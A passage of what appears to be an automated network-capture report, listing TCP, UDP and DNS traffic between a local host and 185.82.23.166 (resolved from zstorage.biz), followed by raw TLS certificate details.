Nov 21, 2017 22:22:11.833307981 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:11.857304096 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:11.865334034 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:11.865350962 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:11.865531921 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:11.865545034 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:11.872682095 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:11.872806072 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:11.872828007 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:11.887999058 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:11.888019085 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:11.888344049 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:11.888358116 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:11.941349030 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:11.941366911 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:11.941911936 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:11.941927910 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:11.956706047 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:11.956724882 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:11.956912994 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:11.956928968 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:11.970434904 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:11.970453978 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:11.970777988 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:11.970793009 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:11.972482920 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:11.972501040 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:11.972789049 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:11.972805023 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.033621073 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.033791065 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:12.033819914 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.048409939 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.048429012 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.048640013 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:12.048686028 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.050095081 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.050113916 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.050338030 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:12.050362110 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.065449953 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.065465927 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.065676928 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:12.065706015 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.112509966 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.112528086 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.112761974 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:12.112796068 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.129991055 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.130008936 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.130228043 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:12.130255938 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.134279966 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.134299994 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.134563923 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:12.134598017 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.134654999 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.134665966 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.135061979 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:12.135088921 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.191050053 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.191070080 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.191317081 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:12.191343069 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.249722004 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.249741077 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.249748945 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.250025988 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:12.250052929 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.256207943 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.256226063 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.256474972 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:12.256505013 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.260678053 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.260936975 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:12.260970116 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.274593115 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.274610996 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.274863005 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:12.274895906 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.346271992 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.346306086 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.346700907 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:12.346733093 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.351874113 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.351892948 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.352137089 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:12.352173090 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.361648083 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.361666918 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.361926079 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:12.361959934 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.427692890 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.427711964 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.427983999 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:12.428014994 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.442996979 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.443253994 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:12.443286896 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.485044956 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.485064030 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.485245943 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:12.485279083 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.497618914 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.497637987 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.497807980 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:12.497837067 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.501461983 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.501481056 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.501652002 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:12.501681089 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.516783953 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.516802073 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.516999960 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:12.517035007 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.640253067 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.640273094 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.640280008 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.640367985 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:12.640388966 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.653944016 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.653961897 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.654356956 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:12.654375076 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.655633926 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.655653000 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.655755043 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:12.655774117 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.740039110 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.740057945 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.740099907 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:12.740117073 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.740514040 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:12.755306005 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.761599064 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.761617899 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.761873960 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:12.761893034 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.765922070 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.765942097 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.766052961 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:12.766073942 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.766213894 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.766227961 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.766427994 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:12.766443968 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.827272892 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.827292919 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.827474117 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:12.827497959 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.838691950 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.838710070 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.838716984 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.838823080 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:12.838845968 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.839642048 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.839662075 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.839835882 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:12.839859009 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.842128992 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.842148066 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.842308044 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:12.842330933 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.947357893 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.947382927 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.947626114 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:12.947659016 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.962975979 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.962996006 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.963207006 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:12.963247061 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.975714922 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.975733042 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.975997925 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:12.976028919 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.992352962 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.992371082 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:12.992615938 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:12.992650032 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:13.056639910 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:13.056659937 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:13.056715012 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:13.056883097 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:13.056921959 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:13.060791969 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:13.060810089 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:13.061027050 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:13.061070919 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:13.076091051 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:13.076109886 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:13.076379061 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:13.076411009 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:13.095607996 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:13.095626116 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:13.095860958 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:13.095895052 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:13.149293900 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:13.149312973 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:13.149568081 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:13.149601936 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:13.164689064 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:13.164706945 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:13.164714098 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:13.164963007 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:13.164997101 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:13.179965973 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:13.179982901 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:13.180247068 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:13.180279016 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:13.251198053 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:13.251435995 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:13.251471996 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:13.449713945 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:13.700073004 MEZ	49168	443	192.168.2.2	185.82.23.166

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 21, 2017 22:21:26.860404968 MEZ	63266	53	192.168.2.2	8.8.8.8
Nov 21, 2017 22:21:27.028328896 MEZ	53	63266	8.8.8.8	192.168.2.2
Nov 21, 2017 22:22:04.026335001 MEZ	51113	53	192.168.2.2	8.8.8.8
Nov 21, 2017 22:22:04.204513073 MEZ	53	51113	8.8.8.8	192.168.2.2
Nov 21, 2017 22:22:04.214704037 MEZ	61861	53	192.168.2.2	8.8.8.8
Nov 21, 2017 22:22:04.353858948 MEZ	53	61861	8.8.8.8	192.168.2.2
Nov 21, 2017 22:22:04.892246962 MEZ	61843	53	192.168.2.2	8.8.8.8
Nov 21, 2017 22:22:05.202033043 MEZ	53	61843	8.8.8.8	192.168.2.2
Nov 21, 2017 22:22:05.213591099 MEZ	59991	53	192.168.2.2	8.8.8.8
Nov 21, 2017 22:22:05.322488070 MEZ	53	59991	8.8.8.8	192.168.2.2
Nov 21, 2017 22:22:07.046863079 MEZ	55271	53	192.168.2.2	8.8.8.8
Nov 21, 2017 22:22:07.417412996 MEZ	53	55271	8.8.8.8	192.168.2.2
Nov 21, 2017 22:22:07.428297997 MEZ	56842	53	192.168.2.2	8.8.8.8
Nov 21, 2017 22:22:07.567926884 MEZ	53	56842	8.8.8.8	192.168.2.2
Nov 21, 2017 22:22:10.226366043 MEZ	53440	53	192.168.2.2	8.8.8.8
Nov 21, 2017 22:22:10.395776987 MEZ	53	53440	8.8.8.8	192.168.2.2

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 21, 2017 22:21:26.860404968 MEZ	192.168.2.2	8.8.8.8	0x2859	Standard query (0)	zstorage.biz	A (IP address)	IN (0x0001)
Nov 21, 2017 22:22:10.226366043 MEZ	192.168.2.2	8.8.8.8	0xd72c	Standard query (0)	zstorage.biz	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Replay Code	Name	CName	Address	Type	Class
Nov 21, 2017 22:21:27.028328896 MEZ	8.8.8.8	192.168.2.2	0x2859	No error (0)	zstorage.biz		185.82.23.166	A (IP address)	IN (0x0001)
Nov 21, 2017 22:22:10.395776987 MEZ	8.8.8.8	192.168.2.2	0xd72c	No error (0)	zstorage.biz		185.82.23.166	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Subject	Issuer	Not Before	Not After	Raw
Nov 21, 2017 22:22:03.258733988 MEZ	443	49164	185.82.23.166	192.168.2.2	CN=zstorage.biz	CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US	Thu Oct 26 12:23:36 CEST 2017	Wed Jan 24 11:23:36 CET 2018	[[ Version: V3 Subject: CN=zstorage.biz Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 23560700598155367255315356602121003432706908288835855806175453142275684183727732665375861115460690686442629520255232730871945167149619588096888963659462152088362214534919479611432975068412248966013428653289800435820351547288949606255968682109922484026520660436163269540296092501689321875992312273456192201077009298817132640269315981044667471396071902116147788500314408855792891315166831693364633710099928935493927017174929650643689955650638558279959550008506883415245120150494950552896989622659621453579338794750003618704914413330474880241269693199713330959838743202638447520620106470949347210404964688977630602115739 public exponent: 65537 Validity: [From: Thu Oct 26 12:23:36 CEST 2017, To: Wed Jan 24 11:23:36 CET 2018] Issuer: CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US SerialNumber: [ 038ee404 e483a226 3ec278aa 38ce735a 8fd9]Certificate Extensions: 8[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://ocsp.int-x3.letsencrypt.org, accessMethod: caIssuers accessLocation: URIName: http://cert.int-x3.letsencrypt.org/]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: A8 4A 6A 63 04 7D DD BA E6 D1 39 B7 A6 45 65 EF .Jjc......9..Ee.0010: F3 A8 EC A1 ....]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:false PathLen: undefined][4]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.23.140.1.2.1][] ] [CertificatePolicyId: [1.3.6.1.4.1.44947.1.1.1][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 1A 68 74 74 70 3A 2F 2F 63 70 73 2E 6C 65 74 ..http://cps.let0010: 73 65 6E 63 72 79 70 74 2E 6F 72 67 sencrypt.org], PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.2 qualifier: 0000: 30 81 9E 0C 81 9B 54 68 69 73 20 43 65 72 74 69 0.....This Certi0010: 66 69 63 61 74 65 20 6D 61 79 20 6F 6E 6C 79 20 ficate may only 0020: 62 65 20 72 65 6C 69 65 64 20 75 70 6F 6E 20 62 be relied upon b0030: 79 20 52 65 6C 79 69 6E 67 20 50 61 72 74 69 65 y Relying Partie0040: 73 20 61 6E 64 20 6F 6E 6C 79 20 69 6E 20 61 63 s and only in ac0050: 63 6F 72 64 61 6E 63 65 20 77 69 74 68 20 74 68 cordance with th0060: 65 20 43 65 72 74 69 66 69 63 61 74 65 20 50 6F e Certificate Po0070: 6C 69 63 79 20 66 6F 75 6E 64 20 61 74 20 68 74 licy found at ht0080: 74 70 73 3A 2F 2F 6C 65 74 73 65 6E 63 72 79 70 tps://letsencryp0090: 74 2E 6F 72 67 2F 72 65 70 6F 73 69 74 6F 72 79 t.org/repository00A0: 2F /]] ]][5]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][6]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_Encipherment][7]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: zstorage.biz][8]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: E5 E8 D0 AA 71 13 06 D3 EA 3B D0 8C 02 93 73 A7 ....q....;....s.0010: 7E F3 87 9B ....]]] Algorithm: [SHA256withRSA] Signature:0000: 38 71 C9 B8 56 2B F3 B4 47 C2 6B 8A 3D 1E D8 67 8q..V+..G.k.=..g0010: F4 12 90 1F 05 F6 92 94 F7 1C 8E B8 50 C9 2D 88 ............P.-.0020: 78 4F C9 F3 44 C6 5D AB 0C B1 E4 24 31 1C 54 1E xO..D.]....$1.T.0030: FF 4A 63 8A 1C 1C F6 89 10 6C 03 C0 FA E4 84 57 .Jc......l.....W0040: 0A 52 64 93 15 88 F3 36 07 95 D0 D8 01 59 F4 A0 .Rd....6.....Y..0050: 61 4C 45 E7 8B 57 60 31 55 8A CC DF 6F 8F 1D 94 aLE..W`1U...o...0060: B6 18 CF 64 94 F7 F1 BB 1F 0E 87 3B 6B 0F AF 4D ...d.......;k..M0070: D1 AE 34 B6 B3 9B 5D B1 25 0C EE F5 F6 A0 1A F4 ..4...].%.......0080: AA F2 7B 26 BC 9C 35 AF 0D 50 BE E7 AC C6 F6 F6 ...&..5..P......0090: 9D 81 15 C8 ED 2B 6E F1 7E 25 DB 2F 69 A4 4F B3 .....+n..%./i.O.00A0: 4D 29 48 65 B2 57 41 BD B6 9E F9 6D C1 6A 7F 87 M)He.WA....m.j..00B0: EC A0 0A 85 32 28 0B CB EF 89 30 4C 5C 94 76 F7 ....2(....0L\.v.00C0: 10 BD 58 A6 07 CE 5C BE 04 CA 87 41 D5 C4 57 F1 ..X...\....A..W.00D0: 8F 4E 4F 54 08 6A 55 7E 8E 76 E5 28 77 3A D2 01 .NOT.jU..v.(w:..00E0: E1 94 9C ED 7B 42 8D 13 B4 8D BB 23 6C B2 F1 0F .....B.....#l...00F0: 0B CD B3 17 F2 0E 08 D9 4F 94 C4 A7 92 B9 24 B1 ........O.....$.]
Nov 21, 2017 22:22:03.258733988 MEZ	443	49164	185.82.23.166	192.168.2.2	CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Thu Mar 17 17:40:46 CET 2016	Wed Mar 17 17:40:46 CET 2021	[[ Version: V3 Subject: CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 19797248476075437682355852246492227182925025209894527646389863306257272162327717438476096960751529894413137923782807258828237626757946953550223743258656059351948211427799114263948499232121738590221774214131983890556391436336270214266656447169277800971416884432628642288505627878176138101439755752196484972290641499489076846352390454201028735981960275647482014359370041238010607728611828345534572152635280172155598035959878659370929022966413402097129857505568509453268467065766156311136296802046438183697980908977865999500405760226706893415483460747503705792669060406182022181441316967415301631965711690685520847684499 public exponent: 65537 Validity: [From: Thu Mar 17 17:40:46 CET 2016, To: Wed Mar 17 17:40:46 CET 2021] Issuer: CN=DST Root CA X3, O=Digital Signature Trust Co. SerialNumber: [ 0a014142 00000153 85736a0b 85eca708]Certificate Extensions: 7[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://isrg.trustid.ocsp.identrust.com, accessMethod: caIssuers accessLocation: URIName: http://apps.identrust.com/roots/dstrootcax3.p7c]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: C4 A7 B1 A4 7B 2C 71 FA DB E1 4B 90 75 FF C4 15 .....,q...K.u...0010: 60 85 89 10 `...]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:0][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl.identrust.com/DSTROOTCAX3CRL.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.23.140.1.2.1][] ] [CertificatePolicyId: [1.3.6.1.4.1.44947.1.1.1][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 22 68 74 74 70 3A 2F 2F 63 